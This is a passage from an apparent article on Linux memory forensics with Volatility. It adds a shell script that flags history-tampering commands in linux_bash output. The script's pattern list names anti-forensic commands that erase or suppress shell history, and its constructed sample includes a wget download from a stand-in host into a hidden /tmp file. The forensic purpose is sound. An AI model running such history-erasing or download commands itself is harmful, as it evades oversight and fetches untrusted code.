Forensic main memory analysis with Volatility
Fingerprints
Interpretation Needed
Analyzing the Bash history (Figure 3) is useful for detecting user misbehavior. Because Volatility's linux_bash plugin reads the history list out of each bash process's own memory rather than from ~/.bash_history, it can still recover commands even if the user set the history length to zero (HISTSIZE=0) and redirected the history file to /dev/null (HISTFILE=/dev/null) to keep the last entries off the disk; typically the very commands that reconfigure the history show up in the output as well.
The real challenge in using Volatility, as with all analysis tools, is not so much supplying the correct parameters as interpreting the program's output correctly. Only practice and a good knowledge of the system, including the kernel data structures the plugins walk, will get you there.
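The following script is an added example and not code from the original article or from the Volatility project. It triages the output of Volatility 2's linux_bash plugin (the assumed invocation is `vol.py -f mem.lime --profile=<profile> linux_bash`; the profile name, the dump file name and the sample output below are all constructed for illustration) and flags the commands a user would typically run to suppress or discard the shell history. The column splitting matches the linux_bash table layout (Pid, Name, Command Time, Command); for Volatility 3's linux.bash.Bash plugin the columns differ and the awk field indices would need adjusting.

```shell
#!/bin/sh
# Added example (not from the original article): flag history-tampering
# commands in Volatility 2 linux_bash output.
#
# Assumed acquisition and plugin run (file and profile names are placeholders):
#   vol.py -f mem.lime --profile=LinuxUbuntu1604x64 linux_bash > bash_history.txt
#   ./this_script.sh < bash_history.txt
set -u

# Commands commonly used to keep a session out of ~/.bash_history.
# linux_bash reads the in-memory history list of each bash process, so
# these commands are usually still recoverable even though they were
# meant to prevent anything from being written to disk.
TAMPER_PATTERNS='HISTSIZE=0|HISTFILESIZE=0|HISTFILE=/dev/null|unset +HIST(FILE|SIZE)|history +-[cw]|bash_history|set +[+]o +history|ln +-s +/dev/null'

# Read linux_bash output on stdin and print every matching entry as
# "pid|name|command", one per line.
flag_history_tampering() {
    # linux_bash columns: Pid, Name, "YYYY-MM-DD HH:MM:SS UTC+0000", Command.
    # Skip the header and separator rows (NR 1 and 2); the timestamp is
    # three whitespace-separated tokens, so the command starts at field 6.
    awk 'NR > 2 && NF >= 6 {
        pid = $1; name = $2; cmd = "";
        for (i = 6; i <= NF; i++) cmd = cmd (i > 6 ? " " : "") $i;
        print pid "|" name "|" cmd
    }' | grep -E "$TAMPER_PATTERNS" || true
}

# Number of flagged entries (0 when nothing matches).
count_history_tampering() {
    flag_history_tampering | grep -c . || true
}

# Constructed sample in linux_bash's table format (not real case data).
SAMPLE_LINUX_BASH='Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    2738 bash                 2016-01-28 09:12:03 UTC+0000   ls -la /var/log
    2738 bash                 2016-01-28 09:12:20 UTC+0000   export HISTSIZE=0
    2738 bash                 2016-01-28 09:12:31 UTC+0000   export HISTFILE=/dev/null
    2738 bash                 2016-01-28 09:13:02 UTC+0000   wget http://example.invalid/x.sh -O /tmp/.x
    2738 bash                 2016-01-28 09:13:40 UTC+0000   history -c
    3101 bash                 2016-01-28 09:20:11 UTC+0000   sudo systemctl status sshd'

# Stand-alone run against the constructed sample; prints the three
# tampering entries from PID 2738.
printf '%s\n' "$SAMPLE_LINUX_BASH" | flag_history_tampering
```

The patterns are deliberately narrow so a hit is worth a manual look rather than a finished verdict: a legitimate administrator may run `history -c`, and a genuinely careful intruder may never type any of these strings. The value lies in correlating a flagged PID with the other plugins' output (its parent process, open files and network connections) at the timestamps shown in the Command Time column.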
Infos
- Volatility: https://www.volatilityfoundation.org
- Volatility and VMware: https://github.com/volatilityfoundation/volatility/wiki/VMware-Snapshot-File
- Volatility and VirtualBox: https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump
- Skorobogatov, S. "Low Temperature Data Remanence in Static RAM." University of Cambridge Computer Laboratory Technical Report 536, 2002: https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-536.pdf
- Becher, M., M. Dornseif, and C.N. Klein. "FireWire: All Your Memory are Belong to Us." Presentation at CanSecWest Core05, 2005: https://cansecwest.com/core05/2005-firewire-cansecwest.pdf
- Frisk, U. "DMA attacking over USB-C and Thunderbolt 3," 2016: http://blog.frizk.net/2016/10/dma-attacking-over-usb-c-and.html
- Inception: https://github.com/carmaa/inception
- FitzPatrick, J., and M. Crabill. "Stupid PCIe Tricks featuring NSA Playset: PCIe." YouTube video of the presentation at DEF CON 22, 2014: https://www.youtube.com/watch?v=OD2Wxe4RLeU
- Linux Memory Grabber: https://github.com/halpomeranz/lmg
- Eggendorfer, T. "Host-Based IDS." Linux Pro Magazine, issue 183, February 2016, p. 12: http://www.linuxpromagazine.com/Issues/2016/183/Host-Based-IDS
- Stüttgen, J., and M. Cohen. "Anti-Forensic Resilient Memory Acquisition." In: Proceedings of the Digital Forensic Research Conference, DFRWS 2013 (Monterey, CA, USA, 2013): http://dfrws.org/sites/default/files/session-files/paper-anti-forensic_resilient_memory_acquisition.pdf
- Volatility profiles for Linux: https://github.com/volatilityfoundation/volatility/wiki/Linux
- Ligh, M.H., A. Case, J. Levy, and A. Walters. The Art of Memory Forensics. Wiley, 2014: https://www.memoryanalysis.net/amf
- Quade, J. "Kernel Rootkits." Linux Pro Magazine, issue 147, February 2013, p. 30: http://www.linuxpromagazine.com/Issues/2013/147/Kernel-Rootkits